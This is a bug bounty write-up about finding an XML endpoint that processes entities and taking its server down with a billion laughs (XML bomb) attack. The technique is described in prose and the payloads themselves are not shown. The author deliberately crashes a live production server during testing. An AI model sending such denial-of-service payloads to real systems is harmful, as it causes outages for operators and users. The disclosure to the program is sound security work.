[Bug Bounty Writeups] Exploiting Insecure XML Parsers to perform Single-Request Denial-of-Service

Hello @everyone 😅
here is a writeup for a bug reported to one of bug bounty programs.

the bug targeted XML parsers and it allows for server resources exhaustion leading to complete denial of service.

During recon phase i found an endpoint that respond with XML formated content 👇 the response looks interesting. I decided to go deeper and test this endpoint 😈

as mentioned in the response, my request was missing some parameters, i tried different techniques trying to get the missing parameters, i tried bruteforcing GET,POST parameters 😣, copying response xml tags and pasting them as GET,POST parameters like ?transactionID ?pTxId , but nothing found😢. few hours later, i realized that the endpoint need an XML-formatted request 😁 so:

1. right click in burp suite repeater and changed request method.

“GET /endpoint HTTP/1.1”

to

“POST /endpoint HTTP/1.1”

2. changed the “content-type:” to “text/xml”

3. copied the response body and pasted it in the request body. 😈

my request was looking like this:

i sent the request and also got the same response “Missing some parameters 🤫”

i noticed this xml tag <initResponse>

i changed:

<initResponse>

to

<initRequest>

and sent the request 😈, guess what? !i found the missing link 😎

the response was:

as you see, the value of request <transactionID> was reflected in the response, the backend is parsing my XML request. let’s see if this parser could process entities.

Request:

YES 😄 , the parser successfuly printed my entity.

i’ve tried to exploit it to get an rce by declaring external entities through SYSTEM, PUBLIC and local dtds but nothing was successful. so i tried to exploit it through that internal entity.

XML Bomb 💣 A.K.A Billion laughs attack :

it’s attack exploiting XML parsers to run the server out of resources, the attack works by defining 10 entities, each defined as consisting of 10 of the previous entity, with the document consisting of a single instance of the largest entity, which expands to one billion copies of the first entity.

at the end, lol9 entity will contain billion of the first entity “😂”, thats why it called billion laughs 😂

let’s kill the server “api.redacted.com” 👿

it took 41.5 seconds for the server to reply to with “502 bad Gateway”.

try to repeat the request?! no, because it was already down 😈

the bug was reported to the program and it didn’t take so long for them to get the server up again. they fixed the bug and rewarded me with $375.

References:

Sullivan, Bryan (November 2009). “XML Denial of Service Attacks and Defenses”. MSDN Magazine. Microsoft Corporation.

Thanks,

Ahmed ElTijani